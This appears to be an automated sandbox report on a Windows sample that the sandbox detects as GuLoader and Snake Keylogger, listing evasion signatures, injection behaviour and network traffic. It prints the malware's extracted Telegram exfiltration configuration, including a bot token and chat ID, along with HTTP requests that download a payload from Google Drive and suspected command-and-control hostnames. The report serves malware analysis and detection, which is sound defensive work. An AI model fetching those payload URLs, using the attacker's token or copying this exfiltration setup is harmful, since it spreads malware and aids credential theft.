Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Swift Copy_19.02.2025.exe

Overview

General Information

Sample name:Swift Copy_19.02.2025.exe
Analysis ID:1620702
MD5:cfd2a2a0de8c10180319835f2c148578
SHA1:a685193f4a254f4a67d116120c870f827d83b561
SHA256:7d9639376d9c7dcecfdf494950100a6d04238a7d510d65c4b52225b634073b24
Tags:exeuser-lowmal3
Infos:

Detection

GuLoader, Snake Keylogger
Score:88
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • Swift Copy_19.02.2025.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\Swift Copy_19.02.2025.exe" MD5: CFD2A2A0DE8C10180319835F2C148578)
    • Swift Copy_19.02.2025.exe (PID: 720 cmdline: "C:\Users\user\Desktop\Swift Copy_19.02.2025.exe" MD5: CFD2A2A0DE8C10180319835F2C148578)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Token": "7868872251:AAGgFQ9Bkl4sqj91n2vPKSuoyNLVzJTqODY", "Chat_id": "8173633564", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.2583953179.0000000034731000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000000.00000002.2371134333.0000000004638000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000006.00000002.2559828926.0000000002CB8000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-02-21T08:22:31.896120+010028033053Unknown Traffic192.168.2.749976104.21.64.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-02-21T08:22:29.637025+010028032742Potentially Bad Traffic192.168.2.749974132.226.247.7380TCP
        2025-02-21T08:22:30.855980+010028032742Potentially Bad Traffic192.168.2.749974132.226.247.7380TCP
        2025-02-21T08:22:32.840208+010028032742Potentially Bad Traffic192.168.2.749977132.226.247.7380TCP
        2025-02-21T08:22:34.168285+010028032742Potentially Bad Traffic192.168.2.749979132.226.247.7380TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-02-21T08:22:24.024973+010028032702Potentially Bad Traffic192.168.2.749972172.217.16.206443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 00000006.00000002.2583953179.0000000034731000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7868872251:AAGgFQ9Bkl4sqj91n2vPKSuoyNLVzJTqODY", "Chat_id": "8173633564", "Version": "4.4"}
        Source: Swift Copy_19.02.2025.exeReversingLabs: Detection: 44%
        Source: Swift Copy_19.02.2025.exeVirustotal: Detection: 52%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

        Location Tracking

        barindex
        Source: unknownDNS query: name: reallyfreegeoip.org
        Source: Swift Copy_19.02.2025.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49975 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49972 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.7:49973 version: TLS 1.2
        Source: Swift Copy_19.02.2025.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_00402868 FindFirstFileW,6_2_00402868
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_004065C7 FindFirstFileW,FindClose,6_2_004065C7
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_00405996
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
        Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
        Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
        Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownDNS query: name: checkip.dyndns.org
        Source: unknownDNS query: name: reallyfreegeoip.org
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49979 -> 132.226.247.73:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49977 -> 132.226.247.73:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49974 -> 132.226.247.73:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49972 -> 172.217.16.206:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49976 -> 104.21.64.1:443
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=18Kyx2LntnZpiKsTwYTgdWT8PutIhm-KW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=18Kyx2LntnZpiKsTwYTgdWT8PutIhm-KW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49975 version: TLS 1.0
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=18Kyx2LntnZpiKsTwYTgdWT8PutIhm-KW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=18Kyx2LntnZpiKsTwYTgdWT8PutIhm-KW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: drive.google.com
        Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
        Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
        Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.0000000034731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.0000000034731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003488B000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003487D000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.00000000347EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003482D000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003488B000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003487D000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.00000000347DE000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.00000000347EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2563934124.00000000042BE000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.0000000034731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
        Source: Swift Copy_19.02.2025.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003488B000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003487D000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.0000000034808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.0000000034731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.0000000034731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
        Source: Swift Copy_19.02.2025.exe, 00000006.00000003.2455210144.000000000426D000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000003.2455142755.000000000426D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2563934124.00000000041F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2563934124.00000000041F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com//
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2563934124.0000000004233000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583400698.00000000338D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=18Kyx2LntnZpiKsTwYTgdWT8PutIhm-KW
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2563934124.0000000004233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=18Kyx2LntnZpiKsTwYTgdWT8PutIhm-KWP
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2563934124.0000000004255000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000003.2489623371.0000000004265000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2563934124.0000000004255000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000003.2489623371.0000000004265000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/b
        Source: Swift Copy_19.02.2025.exe, 00000006.00000003.2455210144.000000000426D000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000003.2489623371.0000000004265000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000003.2455142755.000000000426D000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2563934124.000000000424C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=18Kyx2LntnZpiKsTwYTgdWT8PutIhm-KW&export=download
        Source: Swift Copy_19.02.2025.exe, 00000006.00000003.2489623371.0000000004265000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=18Kyx2LntnZpiKsTwYTgdWT8PutIhm-KW&export=downloadoa
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003482D000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003488B000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003487D000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.00000000347EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.00000000347EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.00000000347EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003482D000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003488B000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003487D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2563934124.00000000042BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189ut
        Source: Swift Copy_19.02.2025.exe, 00000006.00000003.2455210144.000000000426D000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000003.2455142755.000000000426D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: Swift Copy_19.02.2025.exe, 00000006.00000003.2455210144.000000000426D000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000003.2455142755.000000000426D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: Swift Copy_19.02.2025.exe, 00000006.00000003.2455210144.000000000426D000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000003.2455142755.000000000426D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: Swift Copy_19.02.2025.exe, 00000006.00000003.2455210144.000000000426D000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000003.2455142755.000000000426D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: Swift Copy_19.02.2025.exe, 00000006.00000003.2455210144.000000000426D000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000003.2455142755.000000000426D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
        Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
        Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
        Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49972 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.7:49973 version: TLS 1.2
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040542B
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess Stats: CPU usage > 49%
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,6_2_00403359
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 0_2_00404C680_2_00404C68
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 0_2_0040698E0_2_0040698E
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 0_2_703D1B5F0_2_703D1B5F
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_00404C686_2_00404C68
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_0040698E6_2_0040698E
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_03F953706_2_03F95370
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_03F9C1466_2_03F9C146
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_03F96FC86_2_03F96FC8
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_03F9C7386_2_03F9C738
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_03F976F16_2_03F976F1
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_03F93E096_2_03F93E09
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_03F99DE06_2_03F99DE0
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_03F964986_2_03F96498
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_03F9C4686_2_03F9C468
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_03F929E06_2_03F929E0
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: String function: 00402C41 appears 51 times
        Source: Swift Copy_19.02.2025.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2563934124.0000000004233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Swift Copy_19.02.2025.exe
        Source: Swift Copy_19.02.2025.exeBinary or memory string: OriginalFilenamedovetailwise.exeN vs Swift Copy_19.02.2025.exe
        Source: Swift Copy_19.02.2025.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: classification engineClassification label: mal88.troj.evad.winEXE@3/14@4/4
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,6_2_00403359
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 0_2_004046EC GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046EC
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_00402104
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeFile created: C:\Users\user\spinsterishlyJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeMutant created: NULL
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsiB430.tmpJump to behavior
